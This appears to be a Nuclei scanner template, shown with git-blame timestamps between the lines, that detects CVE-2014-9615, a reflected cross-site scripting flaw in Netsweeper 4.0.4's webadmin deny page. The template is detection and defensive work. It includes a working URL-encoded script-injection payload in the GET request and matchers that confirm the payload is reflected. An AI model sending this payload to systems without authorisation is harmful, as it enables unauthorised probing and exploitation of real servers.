2021-12-06 16:38:54 +00:00
id : CVE-2014-9615
info :
2022-02-25 22:07:55 +00:00
name : Netsweeper 4.0.4 - Cross-Site Scripting
2021-12-06 16:38:54 +00:00
author : daffainfo
severity : medium
2022-02-25 22:07:55 +00:00
description : A cross-site scripting vulnerability in Netsweeper 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter to webadmin/deny/index.php.
2021-12-07 07:55:57 +00:00
reference :
- https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
- https://nvd.nist.gov/vuln/detail/CVE-2014-9615
2022-05-17 09:18:12 +00:00
- http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html
2021-12-06 16:40:52 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-12-06 16:40:52 +00:00
cve-id : CVE-2014-9615
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:*
epss-score : 0.00102
2022-08-27 04:41:18 +00:00
tags : cve,cve2014,netsweeper,xss,packetstorm
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2021-12-06 16:38:54 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-12-06 16:38:54 +00:00
- method : GET
path :
2021-12-07 07:55:57 +00:00
- '{{BaseURL}}/webadmin/deny/index.php?dpid=1&dpruleid=1&cat=1&ttl=5018400&groupname=<group_name_eg_netsweeper_student_allow_internet_access&policyname=auto_created&username=root&userip=127.0.0.1&connectionip=127.0.0.1&nsphostname=netsweeper&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2021-12-06 16:38:54 +00:00
matchers-condition : and
matchers :
- type : word
part : body
2021-12-07 07:55:57 +00:00
words :
- '</script><script>alert(document.domain)</script>'
2021-12-06 16:38:54 +00:00
- type : word
part : header
words :
- text/html
- type : status
status :
2021-12-07 07:55:57 +00:00
- 200